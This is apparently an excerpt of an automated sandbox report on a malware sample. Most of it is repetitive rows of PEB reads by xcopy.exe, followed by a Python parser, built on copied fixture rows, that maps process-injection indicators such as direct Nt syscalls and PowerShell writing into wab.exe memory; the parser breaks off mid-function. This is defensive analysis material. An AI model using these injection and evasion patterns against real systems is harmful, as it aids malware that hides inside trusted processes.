        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398A118 mov ecx, dword ptr fs:[00000030h]22_2_0398A118
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398A118 mov eax, dword ptr fs:[00000030h]22_2_0398A118
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A0115 mov eax, dword ptr fs:[00000030h]22_2_039A0115
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03910124 mov eax, dword ptr fs:[00000030h]22_2_03910124
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB136 mov eax, dword ptr fs:[00000030h]22_2_038DB136
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E1131 mov eax, dword ptr fs:[00000030h]22_2_038E1131
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D9148 mov eax, dword ptr fs:[00000030h]22_2_038D9148
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B5152 mov eax, dword ptr fs:[00000030h]22_2_039B5152
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03978158 mov eax, dword ptr fs:[00000030h]22_2_03978158
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03974144 mov eax, dword ptr fs:[00000030h]22_2_03974144
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03974144 mov ecx, dword ptr fs:[00000030h]22_2_03974144
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E6154 mov eax, dword ptr fs:[00000030h]22_2_038E6154
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DC156 mov eax, dword ptr fs:[00000030h]22_2_038DC156
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E7152 mov eax, dword ptr fs:[00000030h]22_2_038E7152
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03979179 mov eax, dword ptr fs:[00000030h]22_2_03979179
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF172 mov eax, dword ptr fs:[00000030h]22_2_038DF172
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DD08D mov eax, dword ptr fs:[00000030h]22_2_038DD08D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390D090 mov eax, dword ptr fs:[00000030h]22_2_0390D090
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E208A mov eax, dword ptr fs:[00000030h]22_2_038E208A
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391909C mov eax, dword ptr fs:[00000030h]22_2_0391909C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E5096 mov eax, dword ptr fs:[00000030h]22_2_038E5096
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A60B8 mov eax, dword ptr fs:[00000030h]22_2_039A60B8
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A60B8 mov ecx, dword ptr fs:[00000030h]22_2_039A60B8
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039780A8 mov eax, dword ptr fs:[00000030h]22_2_039780A8
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B50D9 mov eax, dword ptr fs:[00000030h]22_2_039B50D9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039620DE mov eax, dword ptr fs:[00000030h]22_2_039620DE
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039090DB mov eax, dword ptr fs:[00000030h]22_2_039090DB
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov eax, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F70C0 mov ecx, dword ptr fs:[00000030h]22_2_038F70C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395D0C0 mov eax, dword ptr fs:[00000030h]22_2_0395D0C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039220F0 mov ecx, dword ptr fs:[00000030h]22_2_039220F0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E80E9 mov eax, dword ptr fs:[00000030h]22_2_038E80E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DA0E3 mov ecx, dword ptr fs:[00000030h]22_2_038DA0E3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039050E4 mov eax, dword ptr fs:[00000030h]22_2_039050E4
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039050E4 mov ecx, dword ptr fs:[00000030h]22_2_039050E4
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039660E0 mov eax, dword ptr fs:[00000030h]22_2_039660E0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DC0F0 mov eax, dword ptr fs:[00000030h]22_2_038DC0F0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03964000 mov ecx, dword ptr fs:[00000030h]22_2_03964000
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FE016 mov eax, dword ptr fs:[00000030h]22_2_038FE016
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A903E mov eax, dword ptr fs:[00000030h]22_2_039A903E
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DA020 mov eax, dword ptr fs:[00000030h]22_2_038DA020
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DC020 mov eax, dword ptr fs:[00000030h]22_2_038DC020
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390B052 mov eax, dword ptr fs:[00000030h]22_2_0390B052
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398705E mov ebx, dword ptr fs:[00000030h]22_2_0398705E
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398705E mov eax, dword ptr fs:[00000030h]22_2_0398705E
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03966050 mov eax, dword ptr fs:[00000030h]22_2_03966050
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E2050 mov eax, dword ptr fs:[00000030h]22_2_038E2050
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390C073 mov eax, dword ptr fs:[00000030h]22_2_0390C073
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395D070 mov ecx, dword ptr fs:[00000030h]22_2_0395D070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396106E mov eax, dword ptr fs:[00000030h]22_2_0396106E
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B5060 mov eax, dword ptr fs:[00000030h]22_2_039B5060
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F1070 mov eax, dword ptr fs:[00000030h]22_2_038F1070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F1070 mov ecx, dword ptr fs:[00000030h]22_2_038F1070
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399F78A mov eax, dword ptr fs:[00000030h]22_2_0399F78A
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390D7B0 mov eax, dword ptr fs:[00000030h]22_2_0390D7B0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E07AF mov eax, dword ptr fs:[00000030h]22_2_038E07AF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B37B6 mov eax, dword ptr fs:[00000030h]22_2_039B37B6
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DF7BA mov eax, dword ptr fs:[00000030h]22_2_038DF7BA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396F7AF mov eax, dword ptr fs:[00000030h]22_2_0396F7AF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396F7AF mov eax, dword ptr fs:[00000030h]22_2_0396F7AF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396F7AF mov eax, dword ptr fs:[00000030h]22_2_0396F7AF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396F7AF mov eax, dword ptr fs:[00000030h]22_2_0396F7AF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396F7AF mov eax, dword ptr fs:[00000030h]22_2_0396F7AF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039697A9 mov eax, dword ptr fs:[00000030h]22_2_039697A9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EC7C0 mov eax, dword ptr fs:[00000030h]22_2_038EC7C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E57C0 mov eax, dword ptr fs:[00000030h]22_2_038E57C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E57C0 mov eax, dword ptr fs:[00000030h]22_2_038E57C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E57C0 mov eax, dword ptr fs:[00000030h]22_2_038E57C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039607C3 mov eax, dword ptr fs:[00000030h]22_2_039607C3
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038ED7E0 mov ecx, dword ptr fs:[00000030h]22_2_038ED7E0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E47FB mov eax, dword ptr fs:[00000030h]22_2_038E47FB
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E47FB mov eax, dword ptr fs:[00000030h]22_2_038E47FB
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039027ED mov eax, dword ptr fs:[00000030h]22_2_039027ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039027ED mov eax, dword ptr fs:[00000030h]22_2_039027ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039027ED mov eax, dword ptr fs:[00000030h]22_2_039027ED
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03910710 mov eax, dword ptr fs:[00000030h]22_2_03910710
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E5702 mov eax, dword ptr fs:[00000030h]22_2_038E5702
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E5702 mov eax, dword ptr fs:[00000030h]22_2_038E5702
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E7703 mov eax, dword ptr fs:[00000030h]22_2_038E7703
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391F71F mov eax, dword ptr fs:[00000030h]22_2_0391F71F
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391F71F mov eax, dword ptr fs:[00000030h]22_2_0391F71F
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391C700 mov eax, dword ptr fs:[00000030h]22_2_0391C700
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E0710 mov eax, dword ptr fs:[00000030h]22_2_038E0710
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395C730 mov eax, dword ptr fs:[00000030h]22_2_0395C730
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03915734 mov eax, dword ptr fs:[00000030h]22_2_03915734
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039BB73C mov eax, dword ptr fs:[00000030h]22_2_039BB73C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039BB73C mov eax, dword ptr fs:[00000030h]22_2_039BB73C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039BB73C mov eax, dword ptr fs:[00000030h]22_2_039BB73C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039BB73C mov eax, dword ptr fs:[00000030h]22_2_039BB73C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391273C mov eax, dword ptr fs:[00000030h]22_2_0391273C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391273C mov ecx, dword ptr fs:[00000030h]22_2_0391273C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391273C mov eax, dword ptr fs:[00000030h]22_2_0391273C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E3720 mov eax, dword ptr fs:[00000030h]22_2_038E3720
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FF720 mov eax, dword ptr fs:[00000030h]22_2_038FF720
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FF720 mov eax, dword ptr fs:[00000030h]22_2_038FF720
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FF720 mov eax, dword ptr fs:[00000030h]22_2_038FF720
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391C720 mov eax, dword ptr fs:[00000030h]22_2_0391C720
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391C720 mov eax, dword ptr fs:[00000030h]22_2_0391C720
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A972B mov eax, dword ptr fs:[00000030h]22_2_039A972B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E973A mov eax, dword ptr fs:[00000030h]22_2_038E973A
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E973A mov eax, dword ptr fs:[00000030h]22_2_038E973A
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399F72E mov eax, dword ptr fs:[00000030h]22_2_0399F72E
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D9730 mov eax, dword ptr fs:[00000030h]22_2_038D9730
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D9730 mov eax, dword ptr fs:[00000030h]22_2_038D9730
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922750 mov eax, dword ptr fs:[00000030h]22_2_03922750
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922750 mov eax, dword ptr fs:[00000030h]22_2_03922750
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03964755 mov eax, dword ptr fs:[00000030h]22_2_03964755
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F3740 mov eax, dword ptr fs:[00000030h]22_2_038F3740
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F3740 mov eax, dword ptr fs:[00000030h]22_2_038F3740
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F3740 mov eax, dword ptr fs:[00000030h]22_2_038F3740
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B3749 mov eax, dword ptr fs:[00000030h]22_2_039B3749
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391674D mov esi, dword ptr fs:[00000030h]22_2_0391674D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391674D mov eax, dword ptr fs:[00000030h]22_2_0391674D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391674D mov eax, dword ptr fs:[00000030h]22_2_0391674D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E0750 mov eax, dword ptr fs:[00000030h]22_2_038E0750
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB765 mov eax, dword ptr fs:[00000030h]22_2_038DB765
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB765 mov eax, dword ptr fs:[00000030h]22_2_038DB765
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB765 mov eax, dword ptr fs:[00000030h]22_2_038DB765
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DB765 mov eax, dword ptr fs:[00000030h]22_2_038DB765
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E8770 mov eax, dword ptr fs:[00000030h]22_2_038E8770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0770 mov eax, dword ptr fs:[00000030h]22_2_038F0770
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396368C mov eax, dword ptr fs:[00000030h]22_2_0396368C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396368C mov eax, dword ptr fs:[00000030h]22_2_0396368C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396368C mov eax, dword ptr fs:[00000030h]22_2_0396368C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396368C mov eax, dword ptr fs:[00000030h]22_2_0396368C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E4690 mov eax, dword ptr fs:[00000030h]22_2_038E4690
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E4690 mov eax, dword ptr fs:[00000030h]22_2_038E4690
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039166B0 mov eax, dword ptr fs:[00000030h]22_2_039166B0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DD6AA mov eax, dword ptr fs:[00000030h]22_2_038DD6AA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DD6AA mov eax, dword ptr fs:[00000030h]22_2_038DD6AA
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391C6A6 mov eax, dword ptr fs:[00000030h]22_2_0391C6A6
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D76B2 mov eax, dword ptr fs:[00000030h]22_2_038D76B2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D76B2 mov eax, dword ptr fs:[00000030h]22_2_038D76B2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D76B2 mov eax, dword ptr fs:[00000030h]22_2_038D76B2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EB6C0 mov eax, dword ptr fs:[00000030h]22_2_038EB6C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EB6C0 mov eax, dword ptr fs:[00000030h]22_2_038EB6C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EB6C0 mov eax, dword ptr fs:[00000030h]22_2_038EB6C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EB6C0 mov eax, dword ptr fs:[00000030h]22_2_038EB6C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EB6C0 mov eax, dword ptr fs:[00000030h]22_2_038EB6C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EB6C0 mov eax, dword ptr fs:[00000030h]22_2_038EB6C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391A6C7 mov ebx, dword ptr fs:[00000030h]22_2_0391A6C7
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391A6C7 mov eax, dword ptr fs:[00000030h]22_2_0391A6C7
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A16CC mov eax, dword ptr fs:[00000030h]22_2_039A16CC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A16CC mov eax, dword ptr fs:[00000030h]22_2_039A16CC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A16CC mov eax, dword ptr fs:[00000030h]22_2_039A16CC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A16CC mov eax, dword ptr fs:[00000030h]22_2_039A16CC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399F6C7 mov eax, dword ptr fs:[00000030h]22_2_0399F6C7
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039116CF mov eax, dword ptr fs:[00000030h]22_2_039116CF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395E6F2 mov eax, dword ptr fs:[00000030h]22_2_0395E6F2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395E6F2 mov eax, dword ptr fs:[00000030h]22_2_0395E6F2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395E6F2 mov eax, dword ptr fs:[00000030h]22_2_0395E6F2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395E6F2 mov eax, dword ptr fs:[00000030h]22_2_0395E6F2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039606F1 mov eax, dword ptr fs:[00000030h]22_2_039606F1
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039606F1 mov eax, dword ptr fs:[00000030h]22_2_039606F1
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399D6F0 mov eax, dword ptr fs:[00000030h]22_2_0399D6F0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390D6E0 mov eax, dword ptr fs:[00000030h]22_2_0390D6E0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390D6E0 mov eax, dword ptr fs:[00000030h]22_2_0390D6E0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039736EE mov eax, dword ptr fs:[00000030h]22_2_039736EE
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039736EE mov eax, dword ptr fs:[00000030h]22_2_039736EE
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039736EE mov eax, dword ptr fs:[00000030h]22_2_039736EE
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039736EE mov eax, dword ptr fs:[00000030h]22_2_039736EE
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039736EE mov eax, dword ptr fs:[00000030h]22_2_039736EE
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039736EE mov eax, dword ptr fs:[00000030h]22_2_039736EE
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039136EF mov eax, dword ptr fs:[00000030h]22_2_039136EF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F260B mov eax, dword ptr fs:[00000030h]22_2_038F260B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F260B mov eax, dword ptr fs:[00000030h]22_2_038F260B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F260B mov eax, dword ptr fs:[00000030h]22_2_038F260B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F260B mov eax, dword ptr fs:[00000030h]22_2_038F260B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F260B mov eax, dword ptr fs:[00000030h]22_2_038F260B
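The rows in this report are a flattened table: process path, signature name and detail are run together, and the report's "Jump to behavior" link text is attached to the end. The parser below is an added example written for this page, not part of the Joe Sandbox report or its tooling. It splits such rows back into fields and derives the three things an analyst checks first from this section and the evasion section that follows: PEB reads (fs:[30h]) per function, the process-to-process injection graph from the "Section loaded", "Thread APC queued" and "Memory written" rows, and which of the Nt* calls the report marks as direct syscalls are the memory write/map/resume primitives used for injection. The sample rows are a constructed fixture copied from this report; the set of injection primitives, the basename-level process names and the field names are this example's own choices.

```python
import re
from collections import Counter, defaultdict
from ntpath import basename

# Constructed fixture: rows copied from this report in the flattened shape it is
# rendered in (process path run straight into the signature name, the report's
# "Jump to behavior" link text still attached to the end).
SAMPLE_ROWS = r"""
Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398705E mov ebx, dword ptr fs:[00000030h]22_2_0398705E
Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0398705E mov eax, dword ptr fs:[00000030h]22_2_0398705E
Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395D070 mov ecx, dword ptr fs:[00000030h]22_2_0395D070
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\xcopy.exeThread APC queued: target process: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3240000Jump to behavior
""".strip().splitlines()

# One row = "Source: <process path><signature>: <detail>[Jump to behavior]".
# The path is split from the signature at the first ".exe"; a " | " separator
# between the two, if present, is tolerated.
ROW_RE = re.compile(
    r"^Source: (?P<src>.+?\.exe)\s*\|?\s*"
    r"(?P<sig>Code function|Nt\w+|Section loaded|Thread APC queued|Memory written): "
    r"(?P<detail>.*?)(?:Jump to behavior)?$"
)

# Nt* calls that, issued directly, are the building blocks of process injection.
# This example's own selection, not a list from the report.
INJECTION_PRIMITIVES = {"NtAllocateVirtualMemory", "NtWriteVirtualMemory",
                        "NtProtectVirtualMemory", "NtMapViewOfSection", "NtResumeThread"}


def parse_row(row: str):
    """Split one flattened row into a record; None if it is not a report row."""
    m = ROW_RE.match(row.strip())
    if not m:
        return None
    sig, detail = m["sig"], m["detail"].strip()
    rec = {"src": basename(m["src"]), "sig": sig, "target": None, "detail": detail}
    if sig == "Code function":
        fm = re.match(r"(\S+) mov (\w+), dword ptr fs:\[00000030h\]", detail)
        if fm:                      # a PEB read: function id and destination register
            rec["function"], rec["register"] = fm.group(1), fm.group(2)
    elif sig.startswith("Nt"):      # direct syscall rows carry the return address
        am = re.search(r"Direct from: (0x[0-9A-Fa-f]+)", detail)
        rec["address"] = int(am.group(1), 16) if am else None
    elif sig == "Section loaded":   # a section mapped into another process
        tm = re.search(r"target: (.+?) protection: (.+)$", detail)
        rec["target"], rec["protection"] = basename(tm.group(1)), tm.group(2)
    elif sig == "Thread APC queued":
        rec["target"] = basename(detail.split("target process: ", 1)[1])
    elif sig == "Memory written":
        tm = re.match(r"(.+?) base: ([0-9A-Fa-f]+)$", detail)
        rec["target"], rec["base"] = basename(tm.group(1)), int(tm.group(2), 16)
    return rec


def triage(rows):
    """PEB reads per function, injection edges, and injection primitives per process."""
    records = [r for r in map(parse_row, rows) if r]
    peb = Counter((r["src"], r["function"]) for r in records if r.get("function"))
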